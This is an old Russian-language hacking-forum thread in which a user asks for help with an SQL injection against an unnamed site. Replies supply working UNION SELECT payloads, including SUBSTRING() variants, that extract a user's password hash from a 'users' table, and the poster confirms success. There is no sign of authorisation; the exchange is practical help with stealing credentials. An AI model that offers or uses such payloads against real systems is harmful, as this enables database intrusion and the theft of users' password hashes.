13.11.2005, 15:00
|
|
Познающий
Регистрация: 15.05.2005
Сообщений: 58
С нами:
11046519
Репутация:
1
|
|
вопрос по sql-injection
Дело такое, нашел sql-inj ... подобрал колонки или т.д. и т.п., в итоге получился тако запрос:
-1'+union+select+1,2,pwd,4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
но при таком запросе данные выводятся не полностью, а именно хеш выводится но без последних двух символов, если пробовать изменять limit то сразу выдается ошибка что неверное кол-во колонок..нужен хепл... |
|
|
13.11.2005, 15:41
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами:
11156006
Репутация:
749
|
|
Гм, а зачем тут вообще нужен лимит? И зачем "+" перед "/*"
И вообще обрезаться ничего не должно. Скорее всего обрез идет внутри самого скрипта
|
|
|
|
13.11.2005, 15:55
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
С нами:
11291306
Репутация:
569
|
|
Да, обрезание (слово то какое хорошее) явно делается скриптом. Попробуй воткуть pwd в другое поле. Или юзаешь SUBSTRING() ( http://dev.mysql.com/doc/refman/4.0/...functions.html)
т.е.
-1'+union+select+1,2,SUBSTRING(pwd, 0, 30),4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
потом
-1'+union+select+1,2,SUBSTRING(pwd, 30, 2),4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
вот вроде так |
|
|
|
13.11.2005, 16:01
|
|
Познающий
Регистрация: 15.05.2005
Сообщений: 58
С нами:
11046519
Репутация:
1
|
|
Trinux
SUBSTRING() помогло, огромный респект... =))
ну и +репутации =)
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
